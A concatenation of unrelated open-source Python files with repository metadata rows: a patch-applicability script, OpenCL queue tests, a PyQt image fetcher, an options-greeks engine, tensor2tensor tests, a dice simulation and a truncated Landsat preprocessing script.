ee_files = map(add_java, filter_starting_with(changed_classes, "com"))
ce_diff = git_diff_files(self.ce, origin_version, destination_version)
ee_diff = git_diff_files(self.ee, origin_version, destination_version)
total_conflicts = self.conflicts(ce_files, ce_diff) + self.conflicts(ee_files, ee_diff)
self.last_conflicts = total_conflicts
return len(self.last_conflicts) == 0
def get_conflicts(self):
assert hasattr(self, "last_conflicts")
return self.last_conflicts
def print_usage():
print("Usage: ")
print("python " + sys.argv[0] + " <patch-file> <ce-git-folder> <ee-git-folder> <destination-version> (<origin-version>)")
print("If the origin version is not specified, it will be inferred from the Patch filename. Example:")
print("\tpython " + sys.argv[0] + " SE-2618-3.7.3.jar ../Git/mule-ce ../Git/mule-ee 3.7.4")
def main(args):
if len(args) < 4 or len(args) > 5:
print_usage()
sys.exit(1)
if len(args) == 4:
version = os.path.basename(args[0]).replace(".jar", "").split("-")[-1]
args.append(version)
patch_source, ce_path, ee_path, v_dest, v_org = args
v_dest = PREFIX_BRANCH + v_dest
v_org = PREFIX_BRANCH + v_org
p = PatchDiffer(ce_path, ee_path)
classes = patch_utils.modified_classes(patch_source)
if p.is_applicable(classes, v_org, v_dest):
print("The patch " + args[0] + " is applicable to the " + args[3] + " version")
else:
print("The patch " + args[0] + " has conflicts in files:")
for file in p.get_conflicts():
print("\t- " + file)
if __name__ == "__main__":
main(sys.argv[1:])
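# Example invocation (hypothetical paths, mirroring print_usage above):
#   python patch_applicable_version.py SE-2618-3.7.3.jar ../Git/mule-ce ../Git/mule-ee 3.7.4
# Here the origin version 3.7.3 is inferred from the patch file name.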
| mit | 2,717,768,461,241,766,000 | 34.864198 | 125 | 0.619621 | false | 3.217054 | false | false | false |
apatriciu/OpenStackOpenCL | ServerSidePythonOpenCLInterface/tests/testOpenCLInterfaceQueueObjects.py | 1 | 5499 | import unittest
import PyOpenCLInterface
import sys
class LaptopResources:
listDevicesIDs = [0]
dictProperties = {}
invalidQueueID = 1
device_type = "GPU"
class TestQueues(unittest.TestCase):
# define the expected response
testResources = LaptopResources()
def setUp(self):
retErr = PyOpenCLInterface.Initialize(self.testResources.device_type)
self.assertEqual(retErr, 0)
def tearDown(self):
pass
def testCreateQueue(self):
"""Creates a new context"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
# create mem queue
queueCreateFlags = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueCreateFlags)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
queueProperty, retErr = PyOpenCLInterface.GetQueueProperties(queueID)
self.assertEqual(queueProperty['id'], queueID)
self.assertEqual(queueProperty['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queueProperty['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue(queueID)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught:", sys.exc_info()[0]
def testGetUnknownObjectProperties(self):
"""Tries to retrieve the properties of an inexistent device"""
queueID = 0
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.GetQueueProperties, queueID)
def testRetainAndRelease(self):
"""
Create and release a context
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
retErr = PyOpenCLInterface.ReleaseQueue( queueID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
# try to release again
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.ReleaseQueue, queueID)
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.RetainQueue, queueID)
try:
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
def testMultipleQueues(self):
"""
Creates multiple queues
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queue1ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID])
queueAttribs = []
queue2ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID, queue2ID])
queue1Property, retErr = PyOpenCLInterface.GetQueueProperties(queue1ID)
self.assertEqual(queue1Property['id'], queue1ID)
self.assertEqual(queue1Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue1Property['Context'], contextID)
queue2Property, retErr = PyOpenCLInterface.GetQueueProperties(queue2ID)
self.assertEqual(queue2Property['id'], queue2ID)
self.assertEqual(queue2Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue2Property['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue( queue1ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue2ID])
retErr = PyOpenCLInterface.ReleaseQueue( queue2ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -9,009,627,036,438,824,000 | 44.446281 | 133 | 0.652846 | false | 4.134586 | true | false | false |
codeAB/music-player | singer.py | 1 | 4368 | #!/usr/bin/python3
# -*- coding: utf8 -*-
"""
Fetch the singer's avatar image
"""
import sys
import os
import urllib.parse
import urllib.request
import re
from PyQt5.QtWidgets import (
QApplication, QWidget, QPushButton, QLineEdit, QLabel)
from PyQt5.QtWebKitWidgets import QWebPage, QWebView
from PyQt5.QtCore import Qt, QUrl, pyqtSlot,QTimer
from PyQt5.QtGui import ( QCursor)
class Singer(QWidget):
# def __init__(self,singer,music):
def __init__(self,singer):
super().__init__()
        # Keep the window on top of all other windows
self.setWindowFlags(Qt.WindowOverridesSystemGestures)
        # Targeting X11
self.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.singer = singer
# self.music = music
self.initUI()
self.show()
def initUI(self):
self.w= QWidget(self)
self.setGeometry(300,100,1000,600)
l = QLabel("实用说明,搜索需要的图片,在搜索结果页面点击选择的图片即可设置。。双击此处退出",self)
l.move(0,0)
self.web = QWebView(self)
self.web.loadFinished.connect(self.test)
self.web.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
self.web.page().linkClicked.connect(self.linkClicked)
self.web.setGeometry(0, 30, 1000, 570)
# self.btn = QPushButton("测试",self);
# self.btn.clicked.connect(self.test)
# self.btn.move(300,550)
self.web.load(QUrl("http://image.baidu.com/"))
def test(self):
print("jiazaijieshu")
frame = self.web.page().currentFrame()
searchinput = frame.findFirstElement('#kw')
d = frame.findFirstElement('.img_area_container_box')
d.removeAllChildren()
searchinput.setAttribute("value",self.singer)
# searchinput.setAttribute("readonly","readonly")
def linkClicked(self,url):
# print(url.toString())
url = url.toString()
pattern = re.compile(r'&word=(.*?)&')
s = pattern.findall(url)
k = {'word': s[0]}
kv = urllib.parse.urlencode(k)
url = url.replace("word="+s[0], kv)
res = urllib.request.urlopen(url).read().decode("utf8")
pattern = re.compile(r'currentImg(.*)<div>',re.S)
s = pattern.findall(res)
print(s)
src="http://img3.imgtn.bdimg.com/it/u=673176467,634723054&fm=21&gp=0.jpg"
pattern = re.compile(r'src="(.*?)"')
s = pattern.findall(s[0])
img_url = s[0].replace("&","&")
local = os.path.join('./cache/', self.singer+'.jpg')
user_agent = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0'
req = urllib.request.Request(img_url)
req.add_header('Referer', 'http://music.baidu.com/?from=new_mp3')
req.add_header('User-Agent', user_agent)
f = urllib.request.urlopen(req)
data = f.read()
with open(local, "wb") as code:
code.write(data)
# self.music.picture.setStyleSheet("QLabel{ background:#9B0069;border-image:url("+local+")}")
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.drag_flag = True
# if hasattr(self.window, 'widget1'):
# self.begin_position2 = event.globalPos() - \
# self.window.widget1.pos()
self.begin_position = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
def mouseMoveEvent(self, QMouseEvent):
if Qt.LeftButton and self.drag_flag:
# if hasattr(self.window, 'widget1'):
# self.window.widget1.move(
# QMouseEvent.globalPos() - self.begin_position2)
# self.window.move(QMouseEvent.globalPos() - self.begin_position)
# else:
self.move(QMouseEvent.globalPos() - self.begin_position)
QMouseEvent.accept()
def mouseReleaseEvent(self, QMouseEvent):
self.drag_flag = False
self.setCursor(QCursor(Qt.ArrowCursor))
# def leaveEvent(self,QMouseEvent):
# self.close()
def mouseDoubleClickEvent(self,e):
self.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
s = Singer("张杰")
sys.exit(app.exec_())
| gpl-3.0 | 6,152,910,160,387,240,000 | 34.090909 | 105 | 0.593971 | false | 3.180524 | false | false | false |
tpoy0099/option_calculator | engine_algorithm/calculate_engine.py | 1 | 12864 | #coding=utf8
import threading as THD
import datetime as DT
import engine_algorithm.data_analyser as ANALYSER
import engine_algorithm.database_adaptor as DADAPTOR
from utility.data_handler import TableHandler
from marketdata.marketdata_adaptor import MarketdataAdaptor
from utility.messager import MessageQueue
from utility.self_defined_types import MessageTypes, PassedIndexType, XAxisType
################################################################
class Engine:
etf_code = '510050.SH'
ETF_QUOTE_HEADERS = ('last_price', 'open_price', 'high_price',
'low_price', 'update_time')
STATISTICS_HEADERS = ('implied_vol', 'delta', 'gamma', 'vega',
'theta', 'intrnic', 'time_value')
#-------------------------------------------------------------
def __init__(self, gui):
self.gui = gui
#original position table
self.ori_positions = None
#etf quote
self.etf = TableHandler()
self.etf.reset(1, Engine.ETF_QUOTE_HEADERS, -1)
#marketdata service
self.md = MarketdataAdaptor()
#database service
self.dp = DADAPTOR.DataProxy()
self.__reloadPositions()
#flow control
self.last_sync_time = DT.datetime.now()
#gui communication
self.msg = MessageQueue()
self.msg_event = THD.Event()
self.msg_thread = THD.Thread(target=self.__handleMessage)
self.msg_thread.start()
return
def quit(self):
self.__pushMsg(MessageTypes.QUIT)
self.msg_thread.join()
#-------------------------------------------------------------
def qryUpdateData(self):
self.__pushMsg(MessageTypes.UPDATE_QUOTE_DATA)
def qryEtfQuoteFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_ETF_QUOTE_FEED)
def qryTableDataFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_TABLE_FEED)
def qryPositionBasedata(self):
self.__pushMsg(MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED)
def qryCalGreeksSensibilityByGroup(self, option_group_id, stock_group_id, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_group_id, stock_group_id,
PassedIndexType.GROUP, x_axis_type))
def qryCalGreeksSensibilityByPosition(self, option_rows, stock_rows, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_rows, stock_rows,
PassedIndexType.ROW, x_axis_type))
def qryExerciseCurveByGroup(self, option_group_id, stock_group_id):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_group_id, stock_group_id, PassedIndexType.GROUP))
def qryExerciseCurveByPosition(self, option_rows, stock_rows):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_rows, stock_rows, PassedIndexType.ROW))
def qryReloadPositions(self, positions_data=None):
self.__pushMsg(MessageTypes.GUI_QUERY_RELOAD_POSITIONS, positions_data)
def qrySavePositionCsv(self):
self.__pushMsg(MessageTypes.SAVE_POSITION_CSV)
def __pushMsg(self, msg_type, content=None):
self.msg.pushMsg(msg_type, content)
self.msg_event.set()
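    # Threading sketch: the GUI thread enqueues work through the qry* methods
    # above (each one calls __pushMsg and sets msg_event), while __handleMessage
    # below runs on the worker thread started in __init__ and drains the queue
    # until a QUIT message arrives.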
def __handleMessage(self):
try:
while True:
msg = self.msg.getMsg()
if msg is None:
self.msg_event.wait()
self.msg_event.clear()
#update marketdata order by user
elif msg.type is MessageTypes.UPDATE_QUOTE_DATA:
self.__updateData()
#qry engine provide table data
elif msg.type is MessageTypes.GUI_QUERY_TABLE_FEED:
self.__feedDataTable()
#qry etf data
elif msg.type is MessageTypes.GUI_QUERY_ETF_QUOTE_FEED:
self.__feedEtfQuote()
#qry position base data for editor
elif msg.type is MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED:
self.__feedPositionBaseData()
#cal greeks sensibility
elif msg.type is MessageTypes.GUI_QUERY_CAL_SENSI:
self.__calGreekSensibility(msg.content[0], msg.content[1],
msg.content[2], msg.content[3])
elif msg.type is MessageTypes.GUI_QUERY_EXERCISE_CURVE:
self.__calOptionExerciseProfitCurve(msg.content[0], msg.content[1],
msg.content[2])
elif msg.type is MessageTypes.GUI_QUERY_RELOAD_POSITIONS:
self.__reloadPositions(msg.content)
elif msg.type is MessageTypes.SAVE_POSITION_CSV:
self.__savePosition2Csv()
elif msg.type is MessageTypes.QUIT:
break
except Exception as err:
self.gui.onEngineError(err)
#thread terminate
return
#-----------------------------------------------------------
#positions should be a instance of TableHandler
def __reloadPositions(self, positions=None):
if type(positions) is TableHandler:
pos = positions.toDataFrame()
else:
pos, err = DADAPTOR.loadPositionCsv()
if not err is None:
raise Exception('load position csv failed ...')
#save pos
self.ori_positions = pos
#separate data
option_rows = list()
stock_rows = list()
for r in range(0, pos.shape[0]):
code = pos['code'].iat[r]
contract_type = self.md.getContractType(code)
if contract_type in ['call', 'put']:
option_rows.append(r)
else:
stock_rows.append(r)
option_df = pos.iloc[option_rows, :]
stock_df = pos.iloc[stock_rows, :]
self.dp.initialize(option_df, stock_df)
self.__updateData(True)
return
def __savePosition2Csv(self):
DADAPTOR.savePositionCsv(self.ori_positions)
return
def __updateData(self, update_baseinfo=False):
self.last_sync_time = DT.datetime.now()
#stock
self.__updateEtfData()
stk = self.dp.getStockData()
for r in range(0, stk.rows()):
self.__updateStockRow(r)
#option
opt = self.dp.getOptionData()
for r in range(0, opt.rows()):
if update_baseinfo:
self.__updateRowBaseInfos(r)
self.__updateOptionRow(r)
#update database
self.dp.updateData()
return
#update etf price data
def __updateEtfData(self):
etf_last_price = self.md.getLastprice(Engine.etf_code)
self.etf.setByHeader(0, 'last_price', etf_last_price)
self.etf.setByHeader(0, 'update_time', self.md.getLastUpdateTime(Engine.etf_code))
if not self.etf.getByHeader(0, 'open_price') < 0:
self.etf.setByHeader(0, 'high_price', max(etf_last_price, self.etf.getByHeader(0, 'high_price')))
self.etf.setByHeader(0, 'low_price', min(etf_last_price, self.etf.getByHeader(0, 'low_price')))
else:
O = self.md.getDailyOpen(Engine.etf_code)
H = self.md.getDailyHigh(Engine.etf_code)
L = self.md.getDailyLow(Engine.etf_code)
if O and H and L:
self.etf.setByHeader(0, 'open_price', O)
self.etf.setByHeader(0, 'high_price', H)
self.etf.setByHeader(0, 'low_price', L)
return
def __updateStockRow(self, irow):
pos = self.dp.getStockData()
last_price = self.etf.getByHeader(0, 'last_price')
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getStockMultiplier())
pos.setByHeader(irow, 'last_price', last_price)
pos.setByHeader(irow, 'float_profit', float_profit)
return
#update basic_infos like expiry, strike_price etc.
def __updateRowBaseInfos(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
pos.setByHeader(irow, 'type', self.md.getContractType(code))
pos.setByHeader(irow, 'strike', self.md.getStrikePrice(code))
pos.setByHeader(irow, 'expiry', self.md.getExerciseDate(code))
pos.setByHeader(irow, 'left_days', self.md.getDaysBeforeExercise(code))
return
#update
def __updateOptionRow(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
last_price = self.md.getLastprice(code)
pos.setByHeader(irow, 'last_price', last_price)
###################################
S = self.etf.getByHeader(0, 'last_price')
K = pos.getByHeader(irow, 'strike')
T = pos.getByHeader(irow, 'left_days')
opt_type = pos.getByHeader(irow, 'type')
#greeks
stat = None
if opt_type.lower() == 'call':
stat = ANALYSER.getStatistics(S, K, T, last_price, True)
elif opt_type.lower() == 'put':
stat = ANALYSER.getStatistics(S, K, T, last_price, False)
if stat:
for header in Engine.STATISTICS_HEADERS:
pos.setByHeader(irow, header, stat[header])
#trade state
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getOptionMultiplier())
pos.setByHeader(irow, 'float_profit', float_profit)
return
def __feedDataTable(self):
opt_data = TableHandler()
opt_data.copyDataframe(self.dp.getOptionData().getDataFrame())
stk_data = TableHandler()
stk_data.copyDataframe(self.dp.getStockData().getDataFrame())
ptf_data = TableHandler()
ptf_data.copyDataframe(self.dp.getPortfolioData().getDataFrame())
self.gui.onRepTableFeed(opt_data, stk_data, ptf_data)
return
def __feedEtfQuote(self):
snap_etf = TableHandler()
snap_etf.copy(self.etf)
self.gui.onRepEtfQuoteFeed(snap_etf)
return
def __feedPositionBaseData(self):
tdata = TableHandler()
tdata.copyDataframe(self.ori_positions)
self.gui.onRepPositionBasedataFeed(tdata)
return
def __calGreekSensibility(self, option_idx, stock_idx, idx_type, x_axis_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
if x_axis_type is XAxisType.PRICE:
rtn = ANALYSER.getGreeksSensibilityByPrice(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.VOLATILITY:
rtn = ANALYSER.getGreeksSensibilityByVolatility(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.TIME:
rtn = ANALYSER.getGreeksSensibilityByTime(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
else:
return
self.gui.onRepCalGreeksSensibility(rtn, x_axis_type)
return
def __calOptionExerciseProfitCurve(self, option_idx, stock_idx, idx_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
rtn = ANALYSER.getExerciseProfitCurve(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
self.gui.onRepCalExerciseCurve(rtn)
return
| gpl-2.0 | -3,853,331,277,950,889,500 | 40.230769 | 109 | 0.569419 | false | 3.691248 | false | false | false |
tensorflow/tensor2tensor | tensor2tensor/models/image_transformer_2d_test.py | 1 | 3273 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Transformer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.data_generators import celeba # pylint: disable=unused-import
from tensor2tensor.data_generators import problem_hparams
from tensor2tensor.models import image_transformer_2d
from tensor2tensor.utils import registry
import tensorflow.compat.v1 as tf
class Img2imgTransformerTest(tf.test.TestCase):
def _test_img2img_transformer(self, net):
batch_size = 3
hparams = image_transformer_2d.img2img_transformer2d_tiny()
hparams.data_dir = ""
p_hparams = registry.problem("image_celeba").get_hparams(hparams)
inputs = np.random.randint(256, size=(batch_size, 4, 4, 3))
targets = np.random.randint(256, size=(batch_size, 8, 8, 3))
with self.test_session() as session:
features = {
"inputs": tf.constant(inputs, dtype=tf.int32),
"targets": tf.constant(targets, dtype=tf.int32),
"target_space_id": tf.constant(1, dtype=tf.int32),
}
model = net(hparams, tf.estimator.ModeKeys.TRAIN, p_hparams)
logits, _ = model(features)
session.run(tf.global_variables_initializer())
res = session.run(logits)
self.assertEqual(res.shape, (batch_size, 8, 8, 3, 256))
def testImg2imgTransformer(self):
self._test_img2img_transformer(image_transformer_2d.Img2imgTransformer)
class Imagetransformer2dTest(tf.test.TestCase):
def _test_imagetransformer_2d(self, net):
batch_size = 3
size = 7
vocab_size = 256
hparams = image_transformer_2d.imagetransformer2d_tiny()
p_hparams = problem_hparams.test_problem_hparams(vocab_size,
vocab_size,
hparams)
inputs = np.random.randint(
vocab_size, size=(batch_size, 1, 1, 1))
targets = np.random.randint(
vocab_size, size=(batch_size, size, size, 3))
with self.test_session() as session:
features = {
"inputs": tf.constant(inputs, dtype=tf.int32),
"targets": tf.constant(targets, dtype=tf.int32),
"target_space_id": tf.constant(1, dtype=tf.int32),
}
model = net(hparams, tf.estimator.ModeKeys.TRAIN, p_hparams)
logits, _ = model(features)
session.run(tf.global_variables_initializer())
res = session.run(logits)
self.assertEqual(res.shape, (batch_size, size, size, 3, vocab_size))
def testImagetransformer2d(self):
self._test_imagetransformer_2d(image_transformer_2d.Imagetransformer2d)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -4,113,700,404,917,890,000 | 36.62069 | 81 | 0.677666 | false | 3.515575 | true | false | false |
JuanScaFranTru/Simulation | Practico4/ej3.py | 1 | 1227 | from random import random
def udiscreta(a, b):
u = random()
return int(u * (b - a + 1)) + a
def experiment():
"""
    A pair of fair dice is rolled simultaneously and the sum of both is
    recorded. The process is repeated until every possible outcome
    (2, 3, ..., 12) has appeared at least once.
"""
    # Use a set to store the observed outcomes
throws = set()
iterations = 0
while len(throws) != 11:
        # Roll the dice. The values are uniformly distributed over
        # the interval [1, 6] (the possible values of a die)
die1 = udiscreta(1, 6)
die2 = udiscreta(1, 6)
        # Record the sum of this roll
throws.add(die1 + die2)
        # One more iteration has occurred
iterations += 1
return iterations
def ej3(n):
for i in range(4):
prob1 = 0
prob2 = 0
for j in range(n):
prob1 += experiment()
prob2 += experiment() ** 2
mean = prob1 / n
mean2 = prob2 / n
sigma = (mean2 - mean ** 2) ** (1/2)
print("N = ", n, "Media = ", mean, "Desviación estandar =", sigma)
n = n * 10
ej3(100)
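# Note: experiment() is a coupon-collector style simulation over the 11 possible
# sums, and ej3(100) prints the sample mean and standard deviation of the number
# of rolls for n = 100, 1000, 10000 and 100000 repetitions.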
| gpl-3.0 | 4,595,522,826,287,092,700 | 25.586957 | 77 | 0.568275 | false | 3.096203 | false | false | false |
GFZ-Centre-for-Early-Warning/REM_satex_plugin | run_as_script.py | 1 | 17723 | class SatEx:
'''
Class for running SatEx as script
'''
def __init__(self,config):
        import os
        import subprocess
self.config = config
#setup subrpocess differently for windows
self.startupinfo = None
if os.name == 'nt':
self.startupinfo = subprocess.STARTUPINFO()
self.startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
def updatePForm(self):
#get user edits
self.ls_path = self.config['ls_path']+'/'
self.roi = self.config['roi']
self.out_fname = self.config['out_fname1']
if (self.ls_path =='/' or self.roi == '' or self.out_fname == ''):
return False
else:
return True
def updateCForm(self):
#get user edits
self.raster = self.config['raster']
self.in_train = self.config['in_train']
self.out_fname = self.config['out_fname']
self.label = self.config['label']
self.sieve = self.config['sieve']
self.external = self.config['external']
#in case an external SVM is provided the testing is optional
if self.external:
if (self.raster =='' or self.out_fname == '' or self.sieve == ''):
return False
else:
return True
else:
if (self.raster =='' or self.in_train == '' or self.out_fname == '' or self.label == '' or self.sieve == ''):
return False
else:
return True
def select_input_raster(self):
dirname = PyQt4.QtGui.QFileDialog.getExistingDirectory(self.Pdlg, "Select input directory ","",PyQt4.QtGui.QFileDialog.ShowDirsOnly)
def run_preprocessing(self):
"""Run method that performs all the real work"""
valid_input=self.updatePForm()
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
#find the number of different L8 scenes
#by reading all TIFs splitting off '_Bxy.TIF' and getting unique strings
e = 'Unspecified error'
#instantiate utilities function
ut = utils.utils()
try:
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
try:
#delete any old tmp files that might be in the directory from a killed task
old=ut.delete_tmps(self.ls_path)
#if old > 0: qgis.core.QgsMessageLog.logMessage('Old *satexTMP* files were present. They were deleted.')
if old > 0: print 'Old *satexTMP* files were present. They were deleted.'
except:
e = str('Could not delete old *satexTMP* files. Function utils.delete_tmps.')
raise Exception
try:
pattern = '*.TIF'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
if len(scenes)==0:
pattern = '*.tif'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
1/len(scenes)
except ZeroDivisionError:
e = str('Found no scene in {}'.format(self.ls_path))
raise Exception
else:
print str('Found {} scene(s) in {}'.format(len(scenes),self.ls_path))
#check shapefile roi
try:
driver = ogr.GetDriverByName('ESRI Shapefile')
dataSource = driver.Open(self.roi,0)
layer = dataSource.GetLayer()
print str('Using {} as ROI'.format(self.roi))
except AttributeError:
e = str('Could not open {}'.format(self.roi))
raise Exception
#loop through all scenes
out_files = []
for scene in scenes:
#find all bands for scene exclude quality band BQA and B8
try:
bands = [b for b in ut.findFiles(self.ls_path,scene+'*_B'+pattern) if '_BQA' not in b]
bands = [b for b in bands if '_B8' not in b]
#in case of multiple scenes (and not first scene is processed) check if nr of bands are equal
try:
#only if more than one scene and at least second scene
nr_bands
except:
if len(bands)==0:
e = str('Found no bands for scene {}.'.format(scene))
raise Exception
else:
#store number of bands for potential additonal scenes
nr_bands = len(bands)
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(nr_bands,scene))
else:
if len(bands)!=nr_bands:
e = str('Found {} instead of {} bands (excluding B8 and BQA) for scene {}. If multiple scenes are provided in the input directory, ensure they have equal bands!'.format(len(bands),nr_bands,scene))
else:
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(len(bands),scene))
except:
raise Exception
#Check if ROI and scene overlap
try:
error,overlap = ut.vector_raster_overlap(self.roi,self.ls_path+bands[0])
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function with {} and {}'.format(self.roi,bands[0]))
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('The provided ROI {} does not overlap with scene {}'.format(self.roi,scene))
raise Exception
#use gdalwarp to cut bands to roi
try:
#go through bands
for band in bands:
cmd = ['gdalwarp','-overwrite','-q','-cutline',self.roi,'-crop_to_cutline',self.ls_path+band,self.ls_path+band[:-4]+'_satexTMP_ROI'+pattern[1:]]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Cropped band {} to ROI'.format(band))
except:
e = str('Could not execute gdalwarp cmd: {}.\nError is:{}'.format(' '.join(cmd),error))
raise Exception
# Layerstack
try:
#respect order B1,B2,B3,B4,B5,B6,B7,B9,B10,B11
in_files = [str(self.ls_path+b[:-4]+'_satexTMP_ROI'+pattern[1:]) for b in bands]
in_files.sort()
if nr_bands==10:
# For Landsat 8 B10,B11 considered smaller --> resort
in_files = in_files[2:] + in_files[0:2]
out_file = str(os.path.dirname(self.out_fname)+'/'+scene+'_satex_mul'+pattern[1:])
#call otb wrapper
error = ut.otb_concatenate(in_files,out_file)
if error!='success': raise ZeroDivisionError
#append file to list
out_files.append(out_file)
#qgis.core.QgsMessageLog.logMessage(str('Concatenated bands for scene {}'.format(scene)))
print str('Concatenated bands for scene {}'.format(scene))
except ZeroDivisionError:
e = str('Could not execute OTB ConcatenateImages for scene: {}\nin_files: {}\nout_file: {}. \nError is: {}'.format(scene,in_files,out_file,error))
raise Exception
# after all scenes were processed combine them to a virtual raster tile
try:
cmd = ["gdalbuildvrt","-q","-srcnodata","0","-overwrite",self.out_fname]
for f in out_files:
cmd.append(f)
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Merged {} different scenes to {}'.format(len(out_files),self.out_fname))
except subprocess.CalledProcessError:
e = str('Could not execute gdalbuildvrt cmd: {}'.format(' '.join(cmd)))
raise Exception
##add to map canvas if checked
#if self.Pdlg.checkBox.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_vrt")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
